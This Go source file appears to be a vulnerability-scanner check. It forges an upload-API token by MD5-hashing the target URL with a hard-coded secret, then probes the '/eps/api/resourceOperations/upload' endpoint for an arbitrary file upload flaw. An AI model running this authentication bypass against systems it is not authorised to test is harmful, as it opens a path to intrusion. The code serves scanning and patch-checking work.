package main
import (
"net/http"
"time"
"strings"
"crypto/md5"
"encoding/hex"
"C"
)
//export Exp
func Exp(Input *C.char ) *C.char{
url := C.GoString(Input)
client := http.Client{
Timeout: time.Duration(3) * time.Second,
}
url += "/eps/api/resourceOperations/upload"
str := url + "secretKeyIbuilding"
data := []byte(str)
md5New := md5.New()
md5New.Write(data)
md5String := hex.EncodeToString(md5New.Sum(nil))
token := strings.ToUpper(md5String)
request, err := http.NewRequest("POST", url + "?token=" + token, nil)
if err != nil {
return C.CString("error")
}
resp, err := client.Do(request)
if err != nil {
return C.CString("error")
}
//body, _:= ioutil.ReadAll(resp.Body)
//return C.CString(string(body))
if resp.Header.Get("Set-Cookie") != ""{
return C.CString(url + " 存在任意文件上传漏洞")
}else{
return C.CString("无漏洞")
}
}
func main(){}